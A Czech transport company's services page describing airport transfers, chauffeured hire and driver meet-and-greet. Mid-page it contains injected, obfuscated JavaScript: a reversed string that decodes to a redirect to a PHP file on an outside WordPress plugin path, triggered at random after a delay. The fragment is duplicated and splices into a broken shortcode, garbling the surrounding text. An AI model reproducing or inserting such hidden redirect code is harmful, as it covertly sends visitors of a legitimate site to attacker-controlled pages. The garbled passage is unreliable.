Služby

Přepravní služby

Přepravní služby

Zajišťujeme dopravu cestujících a jejich zavazadel, včetně přepravy z/na letiště, nádraží, hotely. Přepravu zajišťujeme v pohodlných vozech kompakt a business třídy a také minibusech.

Osobní doprava

Osobní doprava

Kromě toho zajišťujeme osobní dopravu pro firmy, svatby, přepravu osob na výlety a zájezdy v České republice a EU.

Dlouhodobý pronájem

Dlouhodobý pronájem

Potřebujete-li auto na několik hodin nebo déle, využijte jedinečnou nabídku od naší společnosti – pronájem auta s řidičem. Ušetříte peníze a dostanete vysoce kvalitní službu.

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andbag“ style=“9″ iconcolor=“greyscale“ title=“Prověřená kvalita“ textcolor=“dark“]Naši pracovnici mají zkušenosti v přepravě cestujících, což nám umožňuje zvolit optimální řešení i pro ty nejsložitější a nestandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardní úlohy a přepravy.

Řidič na letišti v hale příletu Vás přivítá s cedulkou a s logem naši firmy, viditelné z dálky, takže se neztratíte v příletové hale a bezpečně poznáte našeho řidiče.

Náš řidič také může čekat na Vás s předem připravenou cedulkou (tištěnou a laminovanou) s Vaším jménem, nebo logem naší společnosti.

V automobilech VIP a Business třídy vám bude nabídnut denní tisk a nealkoholické nápoje, a v případě deště v každém autě je deštník, pod kterým náš řidič vás doprovodí ke vchodu na letiště.


Neváhejte a zarezervujte si odvoz ještě dnes!

Stačí vyplnit jednoduchý formulář dostupný z následujícího odkazu a náš personál Vás bude v co nejbližší době kontaktovat.